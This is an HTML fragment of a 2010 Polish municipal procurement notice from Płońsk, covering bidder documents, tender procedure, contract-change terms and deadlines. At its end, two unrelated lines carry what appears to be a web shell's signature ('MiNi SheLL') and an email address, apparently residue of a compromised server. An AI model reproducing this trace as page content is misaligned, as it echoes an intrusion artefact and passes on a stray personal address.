<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorysy ofertowe (tzw. ślepe kosztorysy) do każdej z 13 pozycji przedmiotu zamówienia z pkt 3.1. siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy na podstawie art. 144 ust.1 powołanej ustawy  w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)ustawową zmianą obowiązującej stawki podatku od towarów i usług (VAT),
2)zmianą kluczowego personelu Wykonawcy wykonującego zamówienie z powodów, których Wykonawca nie mógł  przewidzieć na etapie składania oferty, 
3)zmianami harmonogramu rzeczowego celem dostosowania do terminu wykonania zamówienia,
4)zmianą terminu wykonania zamówienia.
2. Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności    
    w  postaci aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plonsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy:
09-100 Płońsk, ul. Płocka 39 w Urzedzie Miejskim (wejście od ul. 1 Maja) w Urzędzie Miejskim w Referacie Zamówień Publicznych, pokój 212, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 09:00, miejsce: 09-100 Płońsk, ul. Płocka 39 w Urzedzie Miejskim (wejście od ul. 1 Maja) w Urzędzie Miejskim - Sala Obsługi Interesantow (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 25.08.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com